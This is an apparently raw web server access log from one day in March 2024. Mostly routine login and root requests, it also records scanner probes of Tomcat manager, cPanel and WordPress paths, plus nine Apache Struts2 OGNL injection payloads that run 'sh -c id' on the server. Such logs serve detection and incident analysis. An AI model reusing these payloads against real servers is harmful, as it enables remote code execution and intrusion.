0:0:0:0:0:0:0:1 - - [22/Mar/2024:01:38:57 -0400] "GET /robots.txt HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:01:38:57 -0400] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [22/Mar/2024:06:00:07 -0400] "HEAD / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:06:00:08 -0400] "GET / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:06:14:39 -0400] "GET / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:06:14:40 -0400] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [22/Mar/2024:06:14:40 -0400] "GET /robots.txt HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:06:14:40 -0400] "GET / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:06:14:41 -0400] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [22/Mar/2024:07:50:53 -0400] "POST /CRQA/sendNotificationByPharmacyWs HTTP/1.1" 200 189
0:0:0:0:0:0:0:1 - - [22/Mar/2024:08:15:41 -0400] "POST /CRQA/sendNotificationByPharmacyWs HTTP/1.1" 200 189
0:0:0:0:0:0:0:1 - - [22/Mar/2024:10:17:41 -0400] "GET /manager/html HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:10:17:41 -0400] "GET /manager/html HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:10:17:41 -0400] "GET /___proxy_subdomain_cpanel/manager/html HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:10:17:41 -0400] "GET /___proxy_subdomain_cpanel/manager/html HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:10:17:42 -0400] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [22/Mar/2024:10:17:42 -0400] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [22/Mar/2024:10:17:42 -0400] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [22/Mar/2024:10:17:42 -0400] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [22/Mar/2024:11:00:22 -0400] "GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:11:00:23 -0400] "GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [22/Mar/2024:11:00:24 -0400] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:11:00:24 -0400] "GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:11:00:25 -0400] "GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [22/Mar/2024:11:00:25 -0400] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:11:00:26 -0400] "GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:11:00:27 -0400] "GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [22/Mar/2024:11:00:27 -0400] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:12:26:50 -0400] "GET / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:12:26:59 -0400] "GET / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:20:53:38 -0400] "GET / HTTP/1.1" 302 -
0:0:0:0:0:0:0:1 - - [22/Mar/2024:20:53:38 -0400] "GET /login HTTP/1.1" 200 53385
0:0:0:0:0:0:0:1 - - [22/Mar/2024:21:35:39 -0400] "GET /___proxy_subdomain_webmail/wp-login.php HTTP/1.1" 404 992
0:0:0:0:0:0:0:1 - - [22/Mar/2024:21:35:42 -0400] "GET /___proxy_subdomain_webdisk/wp-login.php HTTP/1.1" 404 992
0:0:0:0:0:0:0:1 - - [22/Mar/2024:21:35:53 -0400] "GET /___proxy_subdomain_cpanel/wp-login.php HTTP/1.1" 404 992